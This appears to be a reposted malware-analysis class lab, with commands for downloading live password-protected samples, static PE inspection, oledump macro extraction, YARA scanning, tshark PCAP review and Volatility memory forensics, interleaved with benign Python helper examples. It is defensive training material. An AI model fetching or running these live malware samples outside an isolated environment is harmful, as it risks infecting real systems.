Advanced Malware v3
############################
# Download the Analysis VM #
############################
https://ift.tt/2O2SFO2
user: infosecaddicts
pass: infosecaddicts
- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
- After logging in, open a terminal window and type the following commands:
cd Desktop/
- This is actual malware (remember to run it in a VM; the password to extract it is 'infected'):
cd /home/infosecaddicts/Desktop/
wget https://ift.tt/2x5fzxZ --no-check-certificate
wget https://ift.tt/2MewK4O --no-check-certificate
unzip malware-password-is-infected.zip
infected
file malware.exe
mv malware.exe malware.pdf
file malware.pdf
mv malware.pdf malware.exe
hexdump -n 2 -C malware.exe
***What is '4d 5a' or 'MZ'***
Reference:
https://ift.tt/QVH11e
objdump -x malware.exe
strings malware.exe
strings --all malware.exe | head -n 6
strings malware.exe | grep -i dll
strings malware.exe | grep -i library
strings malware.exe | grep -i reg
strings malware.exe | grep -i hkey
strings malware.exe | grep -i hku
- We didn't see anything like HKLM, HKCU or other registry-related strings in the output
strings malware.exe | grep -i irc
strings malware.exe | grep -i join
strings malware.exe | grep -i admin
strings malware.exe | grep -i list
- List of IRC commands: https://ift.tt/2oK9mAC
sudo apt-get install -y python-pefile
malware
vi analyse_malware.py
python analyse_malware.py malware.exe
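Added example (not the page's analyse_malware.py, which is not reproduced here): the check behind the '4d 5a' question above, done the way a pefile-style script does it. It identifies a file by its DOS 'MZ' magic, follows e_lfanew to the 'PE\0\0' signature and reads the COFF and section headers, so renaming malware.exe to malware.pdf changes nothing. The sample image is constructed in the code and is not real malware.

```python
import struct
import sys
from datetime import datetime, timezone

COFF_FMT = "<HHIIIHH"         # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics

def build_sample_pe() -> bytes:
    """Constructed minimal PE image (not the lab's malware.exe): DOS header,
    PE signature, COFF header and one section header, no optional header."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"                       # 0x4d 0x5a: the 'MZ' magic hexdump -n 2 shows
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: file offset of the PE signature
    coff = struct.pack(COFF_FMT, 0x14C, 1, 1536537600, 0, 0, 0, 0x0102)  # i386, 1 section, EXE not DLL
    section = struct.pack(SECTION_FMT, b".text\0\0\0", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + section

def parse_pe(data: bytes) -> dict:
    """Classify by headers alone; the file extension is never consulted."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header: not a DOS/PE executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("MZ header but no PE signature (DOS-only or corrupt)")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    sec_off = e_lfanew + 24 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsec):
        fields = struct.unpack_from(SECTION_FMT, data, sec_off + 40 * i)
        sections.append({"name": fields[0].rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": fields[2], "raw_size": fields[3], "chars": fields[9]})
    return {"machine": machine, "is_dll": bool(chars & 0x2000),
            "compiled": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
            "sections": sections}

def is_pe(data: bytes) -> bool:
    """True when both the MZ magic and the PE signature are present."""
    try:
        parse_pe(data)
        return True
    except (ValueError, struct.error):
        return False

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(parse_pe(blob))
```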
Building a Malware Scanner
--------------------------
mkdir ~/Desktop/malwarescanner
cd ~/Desktop/malwarescanner
wget https://ift.tt/2wYyDxI
unzip master.zip
cd malwarescanner-master/
python scanner.py -h
cat strings.txt
cat hashes.txt
mkdir ~/Desktop/malcode
cp ~/Desktop/malware.exe ~/Desktop/malcode
python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
cd ~/Desktop/
#####################################################
# Analyzing Macro Embedded Malware #
# Reference: #
# https://ift.tt/2O0T4As #
#####################################################
cp ~/Desktop/
- Create a FREE account on:
https://ift.tt/2wZ1ulj
- Grab the malware from:
https://ift.tt/2O0T4QY
file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
sudo pip install olefile
malware
mkdir ~/Desktop/oledump
cd ~/Desktop/oledump
wget https://ift.tt/1S5bvSz
unzip oledump_V0_0_22.zip
cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
-----------------------------------------------------------------------------------------------------------------------------------
- Alternatively (same olefile/oledump setup as above), grab the sample as a password-protected zip:
wget https://ift.tt/2O0T6by
unzip 064016.zip
infected
python oledump.py 064016.doc
python oledump.py 064016.doc -s A4 -v
- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
python oledump.py 064016.doc -s A5 -v
- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
python oledump.py 064016.doc -s A3 -v
- Look for "GVhkjbjv" and you should see a long hex string next to it.
- Take that long blob that starts with 636D and finishes with 653B and paste it in:
https://ift.tt/1rAwbqx
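Added example (not the document's macro or the converter linked above): what that paste-in does, done offline. The blob is hex pairs of ASCII, one byte per pair, so a string starting 636D decodes to "cm..." and one ending 653B decodes to "...e;". The sample blob is constructed for this example and spread across VBA string concatenations the way the macro spreads it; the indicator list is an assumption for triage, not a verdict.

```python
import re

# Constructed stand-in for the blob in stream A3 (not the real document's content):
# hex pairs of an ASCII command, split across VBA '&' concatenations. Starts 636D, ends 653B.
SAMPLE_BLOB = '"636d64202f6320" & _\n    "6563686f2062656e69676e2073616d706c65" & _\n    "3b"'

# Keywords worth a second look once the text is readable (assumed triage hints, not verdicts).
INDICATORS = ("cmd", "powershell", "wscript", "shell", "http", "regsvr32")

def extract_hex(blob: str) -> str:
    """Pull the hex digits out of VBA source. Quoted string literals are preferred so
    VBA names such as Chr() are never mistaken for hex; with no quotes the text is
    treated as one bare blob."""
    quoted = re.findall(r'"([0-9A-Fa-f]*)"', blob)
    hexdigits = "".join(quoted) if quoted else re.sub(r"\s", "", blob)
    if not re.fullmatch(r"[0-9A-Fa-f]*", hexdigits):
        raise ValueError("non-hex characters: not a plain hex-encoded string")
    if len(hexdigits) % 2:
        raise ValueError("odd number of hex digits: blob is truncated")
    return hexdigits

def decode_hex_blob(blob: str) -> str:
    """Each pair of hex digits is one byte; latin-1 keeps every byte printable-ish."""
    return bytes.fromhex(extract_hex(blob)).decode("latin-1")

def triage(decoded: str) -> list:
    """Indicator keywords present in the decoded text, in INDICATORS order."""
    low = decoded.lower()
    return [kw for kw in INDICATORS if kw in low]

if __name__ == "__main__":
    text = decode_hex_blob(SAMPLE_BLOB)
    print(text)
    print("indicators:", triage(text))
```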
##############
# Yara Ninja #
##############
sudo apt-get remove -y yara
malware
wget https://ift.tt/2MdWrCs
sudo apt-get -y install libtool
malware
unzip v3.4.0.zip
cd yara-3.4.0
./bootstrap.sh
./configure
make
sudo make install
malware
yara -v
cd ..
wget https://ift.tt/2wWeKHF
unzip master.zip
cd ~/Desktop
yara rules-master/packer.yar malcode/malware.exe
Places to get more Yara rules:
------------------------------
https://ift.tt/2O61G8T
https://ift.tt/2wYlDrT
https://ift.tt/2O0T8QI
Yara rule sorting script:
-------------------------
https://ift.tt/2wVqIkQ
cd ~/Desktop/rules-master
for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
cd ~/Desktop/
yara rules-master/master.yar malcode/malware.exe
Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
https://ift.tt/2O0T9nK
Malware Repositories:
https://ift.tt/2wWLekL
https://ift.tt/1opEqxO
https://ift.tt/1jJIDvi
http://virusshare.com/
https://ift.tt/1HrR3Vm
###############################
# Creating a Malware Database #
###############################
Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
malware
wget https://ift.tt/2wVEVhk
wget https://ift.tt/2x5fzxZ
unzip malware-password-is-infected.zip
infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e
Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:
sudo apt-get install mysql-server
malware
- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:
sudo apt-get build-dep python-mysqldb
malware
sudo apt-get install python-mysqldb
malware
- Step 3: Logging in
- Run the following command in the terminal:
mysql -u root -p (set a password of 'malware')
- Then create one database by running following command:
create database malware;
exit;
wget https://ift.tt/2MewRgK
vi mal_to_db.py (fill in database connection information)
python mal_to_db.py -i
------- check it to see if the files table was created ------
mysql -u root -p
malware
show databases;
use malware;
show tables;
describe files;
exit;
---------------------------------
- Now add the malicious file to the DB
python mal_to_db.py -f malware.exe -u
- Now check to see if it is in the DB
mysql -u root -p
malware
use malware;
select id,md5,sha1,sha256,time FROM files;
quit;
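Added example covering both the sqlite and the mysql sections (not the page's avsubmit.py or mal_to_db.py): a minimal sample database with the same columns the 'describe files' / 'select id,md5,sha1,sha256,time' queries above rely on, using Python's built-in sqlite3 so it runs without a MySQL server. The sha256 column is UNIQUE, so resubmitting a sample returns the existing id instead of creating a duplicate row; the extra filename and size columns are an assumption.

```python
import datetime
import hashlib
import os
import sqlite3

# Columns the page's queries expect (id, md5, sha1, sha256, time) plus filename and size (assumed).
SCHEMA = """CREATE TABLE IF NOT EXISTS files (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    filename TEXT NOT NULL,
    md5 TEXT NOT NULL, sha1 TEXT NOT NULL, sha256 TEXT NOT NULL UNIQUE,
    size INTEGER NOT NULL,
    time TEXT NOT NULL)"""

def hash_bytes(data: bytes) -> dict:
    """md5/sha1/sha256 of a sample."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}

def init_db(path: str = "malware.db") -> sqlite3.Connection:
    """Counterpart of 'avsubmit.py --init' / 'mal_to_db.py -i': create the files table."""
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    conn.commit()
    return conn

def add_sample(conn, name: str, data: bytes):
    """Store one sample. Returns (row id, inserted); inserted=False means the sha256
    was already on file, so the existing id is handed back and nothing is written."""
    h = hash_bytes(data)
    row = conn.execute("SELECT id FROM files WHERE sha256 = ?", (h["sha256"],)).fetchone()
    if row:
        return row[0], False
    cur = conn.execute(
        "INSERT INTO files (filename, md5, sha1, sha256, size, time) VALUES (?, ?, ?, ?, ?, ?)",
        (name, h["md5"], h["sha1"], h["sha256"], len(data),
         datetime.datetime.now(datetime.timezone.utc).isoformat(timespec="seconds")))
    conn.commit()
    return cur.lastrowid, True

def add_file(conn, path: str):
    """Counterpart of 'mal_to_db.py -f malware.exe -u': hash a file on disk and store it."""
    with open(path, "rb") as f:
        return add_sample(conn, os.path.basename(path), f.read())

def lookup(conn, digest: str):
    """Find a sample by md5, sha1 or sha256 (case-insensitive); None if unknown."""
    digest = digest.lower()
    return conn.execute("SELECT id, filename, md5, sha1, sha256, time FROM files "
                        "WHERE md5 = ? OR sha1 = ? OR sha256 = ?", (digest, digest, digest)).fetchone()
```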
#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics
ls | grep pcap
perl chaosreader.pl suspicious-time.pcap
firefox index.html
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
tshark -r suspicious-time.pcap -qz io,phs
for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
#############################
# PCAP Analysis with tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
tshark -r suspicious-time.pcap -qz ip_hosts,tree
tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
whois rapidshare.com.eyu32.ru
whois sploitme.com.cn
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
tshark -r suspicious-time.pcap -qz http_req,tree
tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
Note: tshark 1.10 and later treat -R as a two-pass read filter that needs -2; on a current tshark replace -R "<filter>" with -Y "<filter>" in the commands above.
######################################
# PCAP Analysis with forensicPCAP.py #
######################################
cd ~/Desktop
wget https://ift.tt/2x0Hy1u
sudo easy_install cmd2
malware
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
ForPCAP >>> help
Prints stats about PCAP
ForPCAP >>> stat
Prints all DNS requests from the PCAP file. The id before the DNS entry is the packet's id, which can be used with the "show" command.
ForPCAP >>> dns
ForPCAP >>> show
Prints all destination ports from the PCAP file. The id before the port is the packet's id, which can be used with the "show" command.
ForPCAP >>> dstports
ForPCAP >>> show
Prints the number of source IPs and stores them.
ForPCAP >>> ipsrc
ForPCAP >>> show
Prints the number of web requests and stores them.
ForPCAP >>> web
ForPCAP >>> show
Prints the number of mail requests and stores them.
ForPCAP >>> mail
ForPCAP >>> show
###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "^https://" | sort | uniq
cd ../foremost-1.5.7
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget https://ift.tt/1MoKtDZ
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
cat malicious.js
*****Sorry - no time to cover javascript de-obfuscation today*****
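Added example (not pdf-parser.py and not the lab's carved 00600328.pdf): the object walk the three pdf-parser commands above perform, in one function. It lists every object carrying /JavaScript or /JS, follows a '/JS n 0 R' reference to the stream object that holds the code, and inflates it when the stream is /FlateDecode, which is what --filter did for object 1054. The PDF is constructed in the code with a harmless alert as its script.

```python
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.DOTALL)
REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R\b")          # /JS points at another object
INLINE_RE = re.compile(rb"/JS\s*\((.*)\)", re.DOTALL)       # /JS carries the code as a string
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

def build_sample_pdf() -> bytes:
    """Constructed PDF (not the lab's 00600328.pdf): the catalog's /OpenAction fires
    object 11, a JavaScript action whose code sits in object 1054 as a
    FlateDecode-compressed stream, mirroring the --object 11 / --object 1054 walk."""
    script = zlib.compress(b"app.alert('benign constructed sample');")
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 11 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"11 0 obj << /S /JavaScript /JS 1054 0 R >> endobj\n"
            b"1054 0 obj << /Length " + str(len(script)).encode() +
            b" /Filter /FlateDecode >>\nstream\n" + script + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")

def _stream_text(body: bytes) -> str:
    """Raw stream payload of one object, inflated if its dictionary says /FlateDecode."""
    m = STREAM_RE.search(body)
    if not m:
        return ""
    data = m.group(1)
    if b"/FlateDecode" in body:   # the step pdf-parser's --filter performs
        data = zlib.decompress(data)
    return data.decode("latin-1")

def find_javascript(pdf: bytes) -> dict:
    """Map object number -> script text for every object with /JavaScript or /JS.
    Later definitions of the same object number (incremental updates) win."""
    objects = {int(num): body for num, body in OBJ_RE.findall(pdf)}
    found = {}
    for num, body in objects.items():
        if b"/JavaScript" not in body and b"/JS" not in body:
            continue
        ref = REF_RE.search(body)
        if ref:
            found[num] = _stream_text(objects.get(int(ref.group(1)), b""))
            continue
        inline = INLINE_RE.search(body)
        if inline:
            found[num] = inline.group(1).decode("latin-1")
    return found

if __name__ == "__main__":
    for num, code in find_javascript(build_sample_pdf()).items():
        print(f"object {num}: {code}")
```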
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
from BITCOIN NEWS https://ift.tt/2CCC81T
via Bitcoin News Update
Sunday, September 9, 2018